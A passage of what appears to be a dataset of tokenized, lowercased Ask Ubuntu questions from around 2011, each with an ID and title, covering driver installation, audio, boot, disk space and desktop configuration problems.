xfce4-power-manager-warning ** : could not map keysym 1008ffa8 to keycode trace [ xfpm-button.c:179 ] xfpm_button_xevent_key ( ) : grabbed key 213 : ( ( xfpmbuttonkey ) button_hibernate ) trace [ xfpm-button.c:179 ] xfpm_button_xevent_key ( ) : grabbed key 150 : ( ( xfpmbuttonkey ) button_sleep ) trace [ xfpm-button.c:179 ] xfpm_button_xevent_key ( ) : grabbed key 233 : ( ( xfpmbuttonkey ) button_mon_brightness_up ) trace [ xfpm-button.c:179 ] xfpm_button_xevent_key ( ) : grabbed key 232 : ( ( xfpmbuttonkey ) button_mon_brightness_down ) trace [ xfpm-button.c:179 ] xfpm_button_xevent_key ( ) : grabbed key 244 : ( ( xfpmbuttonkey ) button_battery ) trace [ xfpm-battery.c:148 ] xfpm_battery_refresh_visible ( ) : visible=true : ( ( xfpmshowicon ) show_icon_when_battery_present ) trace [ xfpm-battery.c:284 ] xfpm_battery_refresh_icon ( ) : battery state 4 trace [ xfpm-power.c:1152 ] xfpm_power_refresh_adaptor_visible ( ) : tray icon configuration : : ( ( xfpmshowicon ) show_icon_when_battery_present ) trace [ xfpm-power.c:1117 ] xfpm_power_hide_adapter_icon ( ) : hide adaptor icon trace [ xfpm-power.c:1053 ] xfpm_power_get_power_devices ( ) : power device detected at : /org/freedesktop/upower/devices/battery_c138 trace [ xfpm-power.c:1011 ] xfpm_power_add_device ( ) : battery device detected at : /org/freedesktop/upower/devices/battery_c138 : ( ( xfpmdevicetype ) xfpm_device_type_battery ) trace [ xfpm-battery.c:284 ] xfpm_battery_refresh_icon ( ) : battery state 0 trace [ xfpm-power.c:1152 ] xfpm_power_refresh_adaptor_visible ( ) : tray icon configuration : : ( ( xfpmshowicon ) show_icon_when_battery_present ) trace [ xfpm-power.c:1117 ] xfpm_power_hide_adapter_icon ( ) : hide adaptor icon trace [ xfpm-polkit.c:369 ] xfpm_polkit_init_data ( ) : using unix session polkit subject trace [ xfpm-polkit.c:456 ] xfpm_polkit_check_auth_intern ( ) : action=org.freedesktop.upower.suspend is authorized=true trace [ xfpm-polkit.c:456 ] xfpm_polkit_check_auth_intern ( ) : action=org.freedesktop.upower.hibernate is authorized=true trace [ xfpm-power.c:1152 ] xfpm_power_refresh_adaptor_visible ( ) : tray icon configuration : : ( ( xfpmshowicon ) show_icon_when_battery_present ) trace [ xfpm-power.c:1117 ] xfpm_power_hide_adapter_icon ( ) : hide adaptor icon trace [ xfpm-polkit.c:456 ] xfpm_polkit_check_auth_intern ( ) : action=org.freedesktop.udisks.drive-set-spindown is authorized=true trace [ xfpm-disks.c:170 ] xfpm_disks_get_is_auth_to_spin ( ) : is auth to spin down disks : 1 trace [ xfpm-disks.c:147 ] xfpm_disks_set_spin_timeouts ( ) : on battery=0 spin_down_enabled=0 timeout=800 the program 'xfce4-power-manager ' received an x window system error . this probably reflects a bug in the program . the error was 'badname ( named color or font does not exist ) ' . ( details : serial 365 error_code 15 request_code 150 minor_code 11 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) what could be causing this , and how would i fix it ?
82095	fonts in menu are larger than they should be under awesome wm	i upgraded to oneiric ocelot , running awesome wm . everything works , more or less , fine but one thing i 've noticed is that now my menu fonts and my menu symbols are larger than i 'd like them to be . i used to set them in font settings , but now ( for one i do n't even know where font settings are anymore , i tried gnome-tweak-tool ) the font-settings are gone ? surely i 'm missing something . my prime example is the program evince whose symbols are ginormous . any hints how to tweak it ?
82100	how do i install the nvidia driver for a geforce 6200 ?	i have been recently trying to find a solution for this on the web but did not find something useful or accurate for ubuntu 11.10 . i also consulted the nvidia help , but things there did not work for me . i installed the additional drivers from system settings but they are not fully compatible with my geforce 6200 . first i tried finding how to stop the x server . i succeeded , but another problem was the nouveau kernel . this is really frustrating . can anybody tell me an accurate and authentic way to install nvidia drivers ?
82102	is it possible to tell wine to use openjdk instead of having to install java in it	is it possible to make wine use openjdk ( outside of the wine environment ) instead of having to install java inside of it .
82103	are the results of the system-check taken by `` checkbox-gtk '' public ? where can i watch them ?	with ubuntu there comes a nice possibility to check the compatibility of a new ( or even old ) system and to send these data to the ubuntu developers . the tool to do this is `` checkbox-gtk '' . i would like to know , whether there is a chance to view these results because it would be nice to know if the future system will work with ubuntu . yes . i know about the certified hardware list , but there are only a few systems listed and i hope that more people test there systems with checkbox and commit the results .
82105	how do i get nvidia drivers working on an ideapad z570 ?	i have a lenovo z570 i3 , ive installed the packages available for nvidia and my graphics card is still not recognised ? it displays the following error upon trying to configure it you do not appear to be using the nvidia x driver . please edit your x configuration file and restart the x server any ideas ?
82109	bursts of white noise sound when playing videos	i 've recently freshly reinstalled ubuntu , and mythbuntu , on all my computers . on one of my computers , mythbuntu 11.10 , when i play a video , when it starts , i get a burst of white noise ( static ) that stays on . if i stop the video and restart it , the noise goes away . sometimes if i fast forward or manipulate the video , the noise will start . it seems to be initiated , and stopped , by starting or interacting with the video . any ideas as to why this is happening and how i can get rid of it ? now that i have some free time on the holidays , i 've made a video of the problem and uploaded it here . as you can see in the video , it starts playing normally . i hit the skip forward button a few times , and it 's fine . after a few presses , you can hear the white noise burst . after that , the noise comes or goes at each press of the button . each button press will randomly initiate or kill the white noise . also note that in the video it started without white noise . sometimes , however , the white noise begins immediately on video start . lastly , in the video i just pressed the skip forward and backward buttons . however , pause and and most any other button will also sometimes trigger the white noise . i hope that makes much more clear what the problem is .
82110	can a windows computer access pulse sound server on an ubuntu computer ?	with help i received in this question , i set up all my ubuntu computers so that they all access a central computer for sound output , using pulse audio preferences . i have some windows computers as well . i was wondering if it is also possible to make them clients of the sound server computer , so that they will send their sound output over the network to be played by the ubuntu computer running the pulse audio sound server . and if so , how ? update : i came across this promising web page with instructions for getting a windows computer to send audio to an ubuntu pulseaudio server , but it 's too deep in technobabble for me to parse it into instructions to follow . http : //t.motd.kr/en/archives/2228
82115	startup manager does not affect boot order	running and editing the boot sequence with the startup manager works fine - even saving these settings is done properly ( i can check this with reopening the startup manager ) - but after reboot - these settings are ignored . why ? how can i change that easily ( for beginners ) ? ? ?
82118	espeak returns error on ubuntu server	i want to use espeak on my server , so i can scare my girlfriend from work : ) ubuntu 11.04 server . sudo espeak -v en `` hello i am espeak '' error : alsa lib pcm.c:2212 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2212 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2212 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started
82119	securely sharing files accross the network to ubuntu and linux users	i have an ubuntu 10.04 server that i want to share files to windows and ubuntu users . i also want them to use the login/password provided by my ldap server . now , i am not sure about which path to go now ( yay unix , so many ways of doing the same thing : d ) . i want the users to have a private folder ( accessed only by the user ) , one group folder ( full access to the entire group ) and a general folder ( for everyone on the network ) . now , back on my windows server days i used to have one big shared folder with permissions like this -- -shared folder ( all can see but not write to it ) -- -- -- group1 folder ( all can see but only group can get in , but not write on its root ) -- -- -- -- -user1 folder ( group can see , but not get in , only user with full access ) -- -- -- -- -user2 folder -- -- -- -- -user3 folder -- -- -- -- -group1 group folder ( group can see and write to it with full access ) -- -general folder ( everyone can see and have full access to it ) repeat the same group1 folder structure for other groups . now , this was easily done in windows managing the users permitions . i am not sure how to replicate this functionality on ubuntu , for both my ubuntu and windows users . is that structure doable ? or should i simply go and make separate shares for everything ? ( one share per user , one per group , one general ) or am i missing some other way to do that ? i am not asking for a detailed how to for all this , but an idea on how to do it and which tools i should be looking at would be greatly appreciated . i dont mind having a gui ( web or not ) or just using plain good terminal . i intended to do this using samba+ldap ( ldap server is already working just fine on another vm ) . so any ideas ?
82120	how do i set an environment variable in a unity session ?	as a work-around to an issue with ibus , i 'm trying to unset the variable $ ibus_enable_sync_mode . i have tried placing `` unset ibus_enable_sync_mode '' in various places including : .profile .bashrc /etc/environment as a startup application however , none of this is reflected in applications launched in unity ; for example , when i launch a terminal from unity the result is : ~ $ echo $ ibus_enable_sync_mode 1 where should i set this variable so that unity sources it properly ? edit : the reason why my attempts are not working was because ibus_enable_sync_mode is set internally by unity code on start-up . so , short of modifying and recompiling unity by hand , this does not have a solution .
82124	how do i preserve the recovery paritition for the notebook emachines e442 while installing ubuntu ?	so as wrote in the q , here my problem : i want to install ubuntu ( 11.10 ) on my notebook . on the hard drive i have a 14gb partition for recovery ( with the factory image ) . i need to preserve it at any cost because this notebook comes without any cd/dvd for recovery . could you tell me a safe way to install my beloved uby ?
82132	purple screen on every other reboot	i know simliar questions have been asked but im experiencing this on every other reboot . if i power down my machine ( 11.10 ) , i experience a purple screen freeze . however , if i ctrl , alt , delete , then it suddenly works . this happens everytime . help ?
82133	trackpad freezes often	i have newly installed ubuntu 11.10 on my system and as soon as i start my system the trackpad freezes and i have to restart the system once again and there after every few minutes this keeps happening.any solution for this problem ? ?
82140	how can i boot with an older kernel version ?	the latest kernel is causing problems with my sound , which worked fine with an older version . as i have only ubuntu installed , grub is not getting displayed while booting . how can i manually choose my kernel version while booting ?
82141	how do i get a bcmwl4306 wireless card working ?	i need the driver for my wireless chip , and i do n't know where to get it . can anyone help ? p.s . the driver needed is a bcmwl4306 . also , tell me if i need to use ndiswrapper .
82143	recommendation for bluetooth usb adapter	which bluetooth usb adapter do you guys recommend for ubuntu 11.10/windows compatibility ? the cheapest , the best . of course , no csr deal-extreme please ! thanks a lot for any advice !
82154	how can i get my wireless webcam to work ?	i recently bought this wireless webcam . i 'm having trouble getting it to work on ubuntu 11.04 . i ran lsusb and got the folowing information about the device bus 006 device 003 : id 0416 : a91a winbond electronics corp . i did a google serach for teh device id and this website informs me that it matches the logilink wireless webcam ( so maplin probably just rebranded this ! ) . what this website states is that this device should work , which it does n't . the problem i 'm facing is that i do n't get any actual video being streamed or shown . the built in microphone works and , when running cheese , when i press the camera button on the webcam itself the software recognises that the button is pressed . on that note , when running cheese from the terminal with this webcam attached i get the following error libv4l2 : error getting pixformat : invalid argument libv4l2 : error setting pixformat : input/output error any help is appreciated
82157	how to route kvm virtual machine audio to ubuntu 11.10 host using virt-manager ?	i 've been using kvm in combination with virt-manager and remmina at a fair success up until now . the issue i need to solve now is to get audio from a virtualized windows xp and make it audible on the ubuntu 11.10 host . remmina / rdp works for 'simple ' audio ( system sounds and such ) , but when the source gets trickier ( e.g . flash audio ) , remmina / rdp messes up . so i figured i 'd just connect to the machine directly using virt-manager . unfortunately , it seems that even though i have successfully configured the ac97 audio device on winxp , it 's unable to get it 's output to the ubuntu host . this is probably because virt-manager uses vnc ( and afaik , vnc does n't transport audio ) . does anyone know if there is a solution to fix this ? i 've heard of spice , but the installation required so much voodoo last time i checked , i figured i 'd let that solution boil to maturity a little longer ; ) but perhaps there are other options i have n't thought of yet ( which do n't require switching to virtualbox / vmware ) ...
82160	backlight screen flickering on a sony vaio vpcyb15al	i 've just installed ubuntu 11.10 , and everything went just now when the computer got into suspension , when it got back the screen started flickering , specially on the dashboard , it trends to disappear when i turn down the backlight , at first it was fixed by rebooting the system and now , every time that i start ubuntu as soon as the desktod loads it starts flickering again , please help ! i have a sony vaio vpcyb15al amd dual core e350 with an ati hd 6310 .
82166	is it safe to remount btrfs with compression ?	i 've finally found how to enable compression in btrfs , and would like to do so . however , as my main drive , i 'm not really wanting to risk a change that could corrupt the hard drive . everything i 've read indicates that these options are safe to change , as they only apply on new writes , but i 'd like some more assurance ... can i have a rough explanation on how the compression algorithm works ? is it per file ( as i think it has to be ? ) after this is on , what options/commands are there to recompress the hard drive ?
82171	update rate of `top`	i 've created the personal config file for top and i would like to change the update rate ( the rate at which top updates data about the current processes ) . how do i do that ?
82177	no pdf preview in kbibtex	i 'm using kbibtex ( the kde4 version ) to manage my references for some thesis work . it is not in the repos for ubuntu 11.10 , but i installed it without problems using the v. 0.4-beta1 deb from debian 's repos here : http : //packages.debian.org/sid/kbibtex . the only thing that seems not to work is the pdf-preview , which states `` can not create preview for [ file ] . no part available . '' i suppose it relies on some kde pdf-viewer , but what do i install to make it work ? i should mention that i 'm running the regular ubuntu 11.10 with gnome and unity , not kde .
82179	gnome 3.2 crashing	on an oneiric amd64 ( i.e. , 64-bit ) system , gnome 3.2 is flickering and crashing . i installed ati driver 11.10 and gnome ran much better . i then compiled kernel 3.1 which caused firefox and chrome to crash . i purged kernel 3.1 and firefox and chrome are fine with kernels 3.0.013 and 3.0.0.12 . however , gnome 3.2 is flickering more frequently and will now crash ( the menu is gone and alt-f2-r will not work . only recourse is to to do a hard shutdown and reboot . it was n't crashing at all before kernel 3.1 was compiled and installed . the flickering is frequent , the crashing is new . i had a flicker issue once in a while before i installed kernel 3.1 , but not this frequently . any thoughts on how to reduce the flickering and crashing ?
82184	thunderbird 8 with new mail notification	i use ubuntu 10.10 with thunderbird 8 . i tried couple of add-ons for email notification but none of them worked . i just want this simple feature like in outlook : http : //i.imgur.com/o6lrw.png note : yes , also suggestion of a working minimize-to-tray add-on would be appreciated .
82186	how do i completely uninstall google chrome and chromium ?	i 'm having a problem with chrome and one of its extensions , so i want to completely uninstall everything . i 've uninstalled chrome through the software center , but when i reinstall it , all of my extensions and preferences are still there . if i want to start over from scratch , what do i need to do ?
82190	customizing unity launcher with launcher.qml	i have been customizing the /usr/share/unity-2d/launcher/launcher.qml file so that the launcher will be completely transparent . however , every time i save it and do unity -- replace nothing changes . i found that if i run unity-2d-launcher it loads a new launcher above the one that loads after unity -- replace and the new launcher is transparent , however the old one is still there . this leads me to believe that the launcher is now part of a separate process or something because if i look at my running processes after startup unity-2d-launcher is n't there . i really want to remove that background from my launcher . can someone help ?
82194	claiming the provisioned storage	i created a ubuntu server vm with 64gb provisioned storage . i remember that i specified 30gb to be used for the vm . when i do df -h , i get filesystem size used avail use % mounted on /dev/mapper/analysis -- db-root < br/ > 28g 25g 904m 97 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 793m 228k 793m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 0 2.0g 0 % /run/shm /dev/sda1 228m 45m 171m 21 % /boot the disk is almost full , how can i use my other 30gb from the provisioned storage ? also , when i type in 'sudo parted -l ' : model : vmware virtual disk ( scsi ) disk /dev/sda : 64.4gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 256mb 255mb primary ext2 boot 2 257mb 64.4gb 64.2gb extended 5 257mb 64.4gb 64.2gb logical lvm model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/analysis -- db-swap_1 : 533mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 533mb 533mb linux-swap ( v1 ) model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/analysis -- db-root : 29.5gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 29.5gb 29.5gb ext4
82198	is it possible to keep the window buttons and title opaque and the border transparent ?	the answer might be as simple no , but using ubuntu tweak i made the borders of my windows transparent as shown here : however , the window buttons and window title are also transparent , making them look out of place . can i make the close , minimise , and maximise buttons as well as the window title non-transparent ?
82202	cellc data card not recognized if i boot with it in	in 11.10 i find that i can connect to the internet via broadband connection successfully . the problem is that i can not have the data card attached to the machine while the machine boots up . if i leave the data card in the machine during startup , the data card is not picked up and i then can not connect to the internet . i must first boot up my machine , login , attach the data card into the usb port , wait so 30 seconds . the broadband connection name will then appear in the network dropdown at the top of the screen . an internet connect is now possible via broadband . please let me know what must be done to fix this .
82203	installation of 11.10 on new drive ( no os )	i have a dell dimension 600 xps phoenix bios version a03 , the original hd crashed and burned . dell did n't send os disks ( was on the original drive and no back up disks ) , so i am trying to install ubuntu 11.10 on the new drive . the new drive is a western digital 1tb . i formatted the new drive by putting it in an enclosure and formatting it with windows 7 on my hp system . when i put the cd in the cdrom it boots to the cd with the advanced user screen ( wo n't boot into the usually windows gui ) . when i try to install ( or run from live cd ) i get the same error message . same with trying the various boot options . the message is : vfs : can not open root device `` ( null ) '' or unknown-block ( 8,1 ) please append a correct `` root= '' boot option : here are the available partitions : kernal panic- not syncing : vfs : unable to mount rootfs on unknown-block ( 8,1 ) and then it lists trace messages , then it freezes .
82204	where is `` super '' key for ubuntu running on mac os x with vmware fusion	host os : mac os x lion guest os : ubuntu 11.10 virtualization : vmware fusion i am the type of person that relies heavily on shortcuts . the fact that i do n't have `` super '' key on my mac keyboard really bothers me . at first , i thought the apple/command key would be mapped to the `` super '' key in ubuntu by default , but it did n't work like that . how can i make `` super '' key available to my setup ? thanks . below are shortcuts that involved the `` super '' key . i have labelled the ones that did n't work for me . launcher hold super - invoke the launcher . hold super , then 1 or 2 or 3 and so on until 0 - open or focus an application . the number corresponds to the location of the icon on the launcher from top to bottom . adding shift will open a new instance of the application if it's already open . holding the key is also useful when you want to get to the launcher but do not want to invoke the dash . super-t - open the rubbish bin/trash can . dash tap super - opens the dash . the open signal is sent when you let go of the key , not when you push it down , so if it feels slow just let go of the key earlier . ( not working ) tab - 11.10+ only - move to the next lens ( when the dash is open ) ( not working ) shift-tab - 11.10+ only - move to the previous lens ( when the dash is open ) ( not working ) super - a open applications lens ( not working ) super - f - open files & folders lens ( not working ) super - m ( 11.10+ only ) - open the music lens window management ( not working ) super - w - spread mode , zoom out on all windows in all workspaces . ( not working ) super - d - minimize all windows ; hitting it again restores them . workspace management ( not working ) super - s - expo mode ( for everything ) , zooms out on all the workspaces and lets you manage windows .
82210	how do i get a logitech dinovo mini working ?	has anyone gotten this to work ? i have tried pressing connect on both the dongle as well as the keyboard itself on the back , and still no go . let me know if any of you have had any luck !
82211	how can i read system mail on my admin account ?	on a new server running lucid , i get `` you have new mail '' in my admin account . however , i do n't have a mail command available to read it . do i need to install it manually ( or mutt , etc . ) , or is a mail client included somewhere in the base install ?
82214	how can i change display resolution on an gma 900 ?	how can i change display resolution with gma 900 and ubuntu 11.10 ? i wonder how can i set up a graphic driver on ubuntu system . i just installed ubuntu 11.10 on my desktop ( hewlet packard dc7100 usdt ) i checked system configuration it seems ubuntu does n't recognize my graphic chip set . i can change resolution only 800x600 and 1024x768 . i want to change it 1280x800 .
82219	how can i configure a canon pixma mp780 printer ?	how can i get 11.10 desktop classic to configure canon pixma mp780 printer on ubuntu . new , clean install x86 desktop
82220	grub boot problems with older ubuntu	i have two inter-related problems on my computer . my install of 9.10 had a boot failure last week . looks like a file was deleted or corrupted . i was unable to get it to work . realising it was a boot issue , i took the cd and installed 9.04 to co-exist with 9.10 on the disc . 9.04 was put into a 2.5 gb ext3 partition . i was able to boot into 9.10 from grub menu selection . 9.04 was now the default in grub menu . i want to remove/delete/purge 9.04 completely from my system and `` clean up '' the stuff so that the machine boots straight to 9.10 ( no grub menu ) . i have n't tried to delete partition yet as i 'm uncertain of the possible outcome . i think it might break my boot . here 's my partition table : device boot start end blocks id system /dev/sda1 * 1 29702 238581283+ 83 linux /dev/sda2 29703 30401 5614717+ 5 extended /dev/sda5 30029 30401 2996091 82 linux swap / solaris /dev/sda6 29703 30006 2441817 83 linux /dev/sda7 30007 30028 176683+ 82 linux swap / solaris df -th | grep -v `` fs '' | sort /dev/sda1 ext3 224g 30g 183g 14 % / filesystem type size used avail use % mounted on how are these accomplished in a `` safe '' manner ? also wanted to add that this system has been operational for 2+ years now .
82226	ca n't recognize the microphone on an hp pavilion dv 2000la	i was trying to have a conversation via skype this morning , when surprise there was no sound ; so i opened sound settings to see what could i do about it , and i found this and the mic was n't responding to any sound but instead to some hits on the laptop just at the left side of the track pad ( where is located the hard drive ) , so i opened the laptop to see if there was something wrong with the cable or the conector but everithing was just fine . then , i use a pen drive with ubuntu 11.10 to launch sound setting from the gui of the installer to verify that ther was nothing wrong with he hardware but with the software instead ; i opened sound setting from the installer first screen , and the mic was working fine . so i suppose that i have a problem with the analog input and the internal mic , i suppose that ubuntu is taking both options as if i were choosing always internal input ; that 's my theory , the questions are how do i solve it ? , how do i reinstall the mic software that is causing the problem ? because i do n't want to install ubuntu all over again just by a not recognized mic . here some technical info as requested below : i 'm using a hp pavilion dv 2000la , and ubuntu 11.10 ( oneiric ) running lspci -nn : 00:00.0 host bridge [ 0600 ] : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub [ 8086:27a0 ] ( rev 03 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller [ 8086:27a2 ] ( rev 03 ) 00:02.1 display controller [ 0380 ] : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller [ 8086:27a6 ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation n10/ich 7 family high definition audio controller [ 8086:27d8 ] ( rev 02 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 1 [ 8086:27d0 ] ( rev 02 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 3 [ 8086:27d4 ] ( rev 02 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 4 [ 8086:27d6 ] ( rev 02 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 1 [ 8086:27c8 ] ( rev 02 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 2 [ 8086:27c9 ] ( rev 02 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 3 [ 8086:27ca ] ( rev 02 ) 00:1d.3 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 4 [ 8086:27cb ] ( rev 02 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb2 ehci controller [ 8086:27cc ] ( rev 02 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev e2 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801gbm ( ich7-m ) lpc interface bridge [ 8086:27b9 ] ( rev 02 ) 00:1f.1 ide interface [ 0101 ] : intel corporation 82801g ( ich7 family ) ide controller [ 8086:27df ] ( rev 02 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 82801gbm/ghm ( ich7 family ) sata ahci controller [ 8086:27c5 ] ( rev 02 ) 00:1f.3 smbus [ 0c05 ] : intel corporation n10/ich 7 family smbus controller [ 8086:27da ] ( rev 02 ) 05:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 02 ) 08:08.0 ethernet controller [ 0200 ] : intel corporation pro/100 ve network connection [ 8086:1092 ] ( rev 02 ) 08:09.0 firewire ( ieee 1394 ) [ 0c00 ] : ricoh co ltd r5c832 ieee 1394 controller [ 1180:0832 ] 08:09.1 sd host controller [ 0805 ] : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter [ 1180:0822 ] ( rev 19 ) 08:09.2 system peripheral [ 0880 ] : ricoh co ltd r5c592 memory stick bus host adapter [ 1180:0592 ] ( rev 0a ) 08:09.3 system peripheral [ 0880 ] : ricoh co ltd xd-picture card controller [ 1180:0852 ] ( rev 05 ) here are the codecs foud in /proc/asound/card0 and /proc/asound/intel : codecs card0 and intel thanks a lot for your answers , i apologize english is not my first language . god bless you guys
82229	how can i make the unity sidebar visible permanently ( as in , in all circumstances ) in unity 2d ?	yes , i have seen the other similar questions ; if this is a duplicate please link me to the question that answer this , because none of them appear to ; all appear to only address ( 1 ) of the two issues below : there are two times when the sidebar will magically vanish : 1 ) by default when you move your cursor off it and focus on a different app . this is fixable by setting the auto hide behaviour , as described here : how to make the unity launcher always visible ? 2 ) when you move a window over / under it , or maximize a window . even when the autohide setting is 'never ' this will cause the sidebar to mysterious decide to hide itself . in fact , it does n't appear what settings you change , this behaviour refuses to change . this is extremely undesired behaviour . i 'm using a stock standard 11.10 install . i 've also uploaded a video to youtube showing this not working in a virtual machine here : http : //youtu.be/asjrp6-miho the steps to reproduce are very simple : install ubuntu on virtual box ( do not enable 3d acceleration ) set the hide behaviour i can confirm that the setting does work when you swap to unity 3d . to reproduce : install guest addons stop your virtual machine enable 3d acceleration restart~ in summary , this seems to be an issue in unity 2d , not unity 3d . however , i still want a solution if anyone knows one . i run ubuntu as a vm in lots of situations and 3d acceleration is not always available . help !
82234	local user logging when centrify express installed	i had installed centrify express in ubuntu 11.10 from softer center . after that i am able to logging in windows domain , but i am not able logging local user account please help me ony other way to add the ubuntu 11.10 in windows domain . i tried likewise also
82235	how can i disable window minimization from the `` window list '' gnome panel ?	i want clicking on an entry in the `` window list '' gnome panel to : leave the window in front if it is already in front . bring it to front if it is not already in front . i 'm looking for an option to disable this function for this panel in gconf , or disable minimization in general throughout the wm ( i never want to use it ) or , i can download source and replace this panel . i am in gnome 3.0.1 .
82236	how do i un-zoom compiz ?	i 'm using a keyboard i 'm not used to , and i hit super_l instead of alt_l when i middle-mouse-dragged across the screen . on this ubuntu 10.04 with compiz , apparently , this zooms the screen to the area that i dragged across . now i 'm stuck . i can super-middle-drag across a bigger area , but apparently i ca n't quite hit all of the corners exactly because the screen still moves a bit when i move the mouse around . how do i undo this zoom effect completely ? this looks like `` ezoom '' , which says that super- '' 1 '' ( default keybinding , anyway ) should reset it , but that does n't seem to work here . close ...
82246	how can i open libreoffice-impress with the task pane being hidden as default ?	i often use libreoffice-impress to open some .ppt files , and usually i just read them , need n't modify them . so , the task pane is not needy . but , every time i open a .ppt file , the task pane is shown and i have to hide it manually . so how can i set it as a default that the task pane is hidden ?
82248	i want to buy a computer to connect to lcd toshiba regza 40 ''	i plan to buy a pc for use ubuntu 10.10 ( x32 bit ) on tv screen of toshiba ( model regza 40 inch ) my current pc is n't support hd connection properly what is the company 's that i can trust them hardware drivers ? nvidia did me a lot of troubles ... are there a motherboard / graphic card that i can be sure will work ?
82249	activity log manager is not preventing zeitgeist from logging files	i am running gnome shell and i do not like zeitgeist indexing all my files . this makes the overview search in gnome-shell very slow . i do not want the overview to search recent files , so i installed activity log manager to prevent zeitgeist 's logging activity . i configured the log manager as below . but even after adding every folder , the files keep appearing in the overview under recent items . is there any other software or tweak which will instruct zeitgeist to search only applications installed in my system and not my recent files .
82251	`` ubuntu '' session is not showing in lightdm menu list after an update	i am using using ubuntu 11.10 . everything was working perfectly this morning . at a moment `` ubuntu software center '' application was unable to get started . so i restarted by system and when i logged in it started under gnome . again when i try to start in ubuntu session then it was not showing in menu list but ubuntu 2d is coming . i do n't come to know why this is happening . please let me know any fix for this issue . vivek @ vivek-desktop : ~/desktop $ glxinfo | grep rendering direct rendering : yes vivek @ vivek-desktop : ~/desktop $ glxgears running synchronized to the vertical refresh . the framerate should be approximately the same as the monitor refresh rate . 301 frames in 5.0 seconds = 60.075 fps 301 frames in 5.0 seconds = 60.018 fps 301 frames in 5.0 seconds = 60.018 fps 301 frames in 5.0 seconds = 60.017 fps 299 frames in 5.0 seconds = 59.616 fps 301 frames in 5.0 seconds = 60.016 fps 301 frames in 5.0 seconds = 60.021 fps 301 frames in 5.0 seconds = 60.018 fps 301 frames in 5.0 seconds = 60.019 fps 300 frames in 5.0 seconds = 59.817 fps
82254	weird graphical bug when installing on an asus g51jx	each and every time i attempt to install ubuntu 11.04 or 11.10 i get this bug after the very first ubuntu loadscreen pops up from the boot cd . i have been able to successfully load 10.04 and 10.10 on it but it refuses to load 11.10 . even attempting to update from 10.10 to 11.04 caused this very same issue . i am running on an asus g51jx . please help i have been trying to get this working for two weeks now . i do like 10.10 but i would rather have 11.10 : (
82255	how do i permanently enable mobile broadband on boot ?	i would like to permanently check `` enable mobile broadband '' so i do n't have to check it after every boot .
82256	can i install ubuntu on a lenovo e520-1143 ?	i have a lenovo e520-1143 . at the moment i have windows 7 professional 64bit installed . is it possible to install ubuntu 11.10 in my laptop ? if i installed ubuntu 11.10 will the devices such as audio , display , bluetooth , lan , wan , fingerprint , etc . works for me ? if i install ubuntu will it detected all devices ?
82257	which programming language suits a system that must work without user input	i 'm building a prototype of a device that will function much alike a digital photoframe . it will display images retrieved from the internet . the device must start up and run the photoframe . it will have no user interface . the device has a minimal ubuntu installation , but i could install xorg or whatever needed . question : i have trouble figuring out which programming language will be suitable . i 've just started using python to try out several things and i am able to download and display images . i guess that means python can do what i 'd like , but is it suitable as a language that will be run on boot without any user interference ? related questions : - how do i set up linux to start that script automatically ? - how to setup a second python script as a server that runs in the background to retrieve images before they are displayed ( because i think i 'll need threading of some sort ? )
82258	commandline email to internal web mail server	i have a few number of ubuntu pcs , whom i want to mail me some kind of log on daily basis . the problem is that these pcs have access only to the internal webmail ( of my campus ) and all i can find on google is info regarding sending mails to gmail accounts . please help me solve this problem .
82264	'find in files ' from nautilus 's context menu ?	is there a way to add the gnome search tool to nautilus context menu so it starts from the current directory , like the 'open in terminal ' context menu tool ?
82266	how do i keep the thunderbird profile in sync between multiple computers ?	i 'd like to find a definitive solution to automatically keep my thunderbird profile in sync between my laptop and my desktop computer . i 'm using imap , so keeping the e-mail itself in sync is not an issue i can use ubuntu one for the contacts , so that should not be an issue , either . however , there are a bunch of other files and folders in the thunderbird profile , and i 'm not sure which ones i should keep in sync and which ones i should n't bother about . ideally , i 'd like to use ubuntu one to mark the required ones for syncing , but i would appreciate any help in deciding which ones exactly need to be synced .
